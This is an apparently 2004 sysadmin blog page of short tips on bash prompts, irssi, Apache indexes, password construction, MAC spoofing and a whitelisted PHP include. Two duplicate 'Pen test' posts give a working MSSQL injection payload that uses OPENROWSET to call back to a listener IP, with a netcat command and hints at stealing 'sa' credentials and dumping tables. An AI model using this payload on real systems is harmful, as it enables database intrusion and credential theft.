Editing the .bash_profile to your needs

Udgivet den februar 9, 2004 af zentry 
When you've installed bash from scratch or from ports on BSD bash is pretty ugly.
it looks something like this: 

bash-2.05b$

pretty useless
 
it is here .bash_profile comes in to view

I'm not going blabber alot with long howto's etc. an example is the best manual imho.

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/games:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin:/home/merbt/bin 
SHELL=/usr/local/bin/bash #this defines the SHELL variable
MANPATH=/usr/man #the MANPATH where your manpages are stored.
PS1='\u@\h:\w\$> '

this is different usufull functions:
\d - shows the date
\H - the FULL hostname example: zentry.god.at.heaven.net
\h - the hostname up to the first "." example : zentry (without the .go... etc.)
\s - name of the shell, but pretty useless.
\T - the time in 12 hour HH:MM:SS format.
\t - the time in 24 hour HH:MM:SS format.
\@ - the time in AM/PM format.
\u - the username of the current user.
\w - current working directory. example: /usr/local/bin
\W - the basename of the current directory. /bin


basically what .bash_profile does is to execute a series of commands everytime you login, here we are editing the global system variables for the current user.
you could add lines that starts different programs, etc.

afte editing your .bash_profile your shell should look something like this:

zentry@pinable:~$> voila! ;)

O'reilly has released a book about the bash shell "Learning the bash shell" by Cameron Newham & Bill Rosenblatt
Udgivet i FreeBSD, Old Base, Shellscript | Skriv en kommentar

loggin in irssi

Udgivet den februar 8, 2004 af Brian Lund Klint 
If you dont want to read the /help to find out how to log your channels and personal chats in irssi just use
/set autolog on 

//Vladimirr - Vladimirr.dk
Udgivet i Knowledge Base | Skriv en kommentar

loggin in irssi

Udgivet den februar 8, 2004 af Valdimirr 
If you dont want to read the /help to find out how to log your channels and personal chats in irssi just use
/set autolog on
Vladimirr.dk
Udgivet i Uncategorized | Skriv en kommentar

How to move channels in irssi

Udgivet den januar 19, 2004 af Valdimirr 
/windows move X
X is the number you want to move the current channel to.
Vladimirr.dk
Udgivet i IRC, Knowledge Base, Old Base | Skriv en kommentar

Enabling directory indexes in Apache (2)

Udgivet den januar 12, 2004 af mike 
The default setting should be something like:

<Directory />
    Options FollowSymLinks
    AllowOverride All
</Directory>


Just add indexes:

<Directory />
    Options FollowSymLinks indexes
    AllowOverride All
</Directory>
Udgivet i Apache, FreeBSD, Knowledge Base, Lamp, Linux, Old Base | Skriv en kommentar

Strong passwords

Udgivet den januar 7, 2004 af mike 
1. Pick a sentence that has meaning for you and that you will remember.
	i.e. I work at cox today.
2. All consonants (or all vowels) become UPPERCASE characters.
3. All vowels (or all consonants as it is the opposite of rule 2) become
lower case characters.
4. Words like to and for become numbers.
5. Words like at and "and" become symbols (@ and &)
6. Add some character to the end like ! or #

now my password is iW@C2day!
Udgivet i Knowledge Base, Old Base, Security | Skriv en kommentar

Change MAC Adress on Windows 2000

Udgivet den januar 7, 2004 af mike 
Check out this new tool for changing MAC addresses on Windows 2000 & XP, 
for almost all Network Adapters out there!  It doesn't change the hardware 
MAC address, just the MAC address that got interpreted by the network 
adapter drivers and Windows.

You can download it at: 
http://www.klcconsulting.net/smac

*** Note: "00-00-00-00-00-00" is a NOT a valid MAC address for testing so 
it will not work.  Try a MAC address that's couple numbers off from your 
TRUE MAC address for testing***
Udgivet i Knowledge Base, Networking, Windows, Workstation | Skriv en kommentar

Pen test, SQL Injection

Udgivet den januar 7, 2004 af mike 
Here's the string you can drop in web form inputs to see if they're vulnerable to
SQL injection (on Microsoft SQL server anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address w/ that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window.  This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000.  If you replace the 'select @@version' with
another command, you can cause the remote database to try and connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
Udgivet i Knowledge Base, Old Base, SQL | Skriv en kommentar

Pen test, SQL Injection

Udgivet den januar 7, 2004 af Brian Lund Klint 
Here's the string you can drop in web form inputs to see if they're vulnerable to
SQL injection (on Microsoft SQL server anyway):

'; select * from OPENROWSET('SQLOLEDB','192.168.0.1';;,'select @@version')--

To verify results, replace the IP address w/ that of the machine you're testing from,
and use netcat (attached) to listen on port 1433 with the following syntax:

nc -vvv -l -p 1433

If the test is successful, you should see a connection and some garbage characters
in the netcat window.  This type of attack is particularly heinous to customers
running Microsoft SQL Server 7/2000.  If you replace the 'select @@version' with
another command, you can cause the remote database to try and connect using its
own 'sa' user and password in clear text and capture it with a sniffer.

IF you want to get REALLY tricky, download 'data thief v1.0' and dump all of their
tables in a handy GUI format.

http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf
Udgivet i Exploits, Knowledge Base, Security | Skriv en kommentar

Secure include($_REQUEST[‘page’])

Udgivet den januar 5, 2004 af mike 
<?
    $allowed=explode(' ','forside profil produkter sikkerhed service kontakt');

    if (in_array($_REQUEST['p'],$allowed))
    {
        include($_REQUEST['p'].'.inc');
    }
    else
    {
        include($allowed[0].'.inc');
    }
?>


include file.inc as contained in $_REQUEST['p'] (query variable) if `file` are liste in the $allowed array.
Udgivet i Apache, Knowledge Base, Old Base, Security | Skriv en kommentar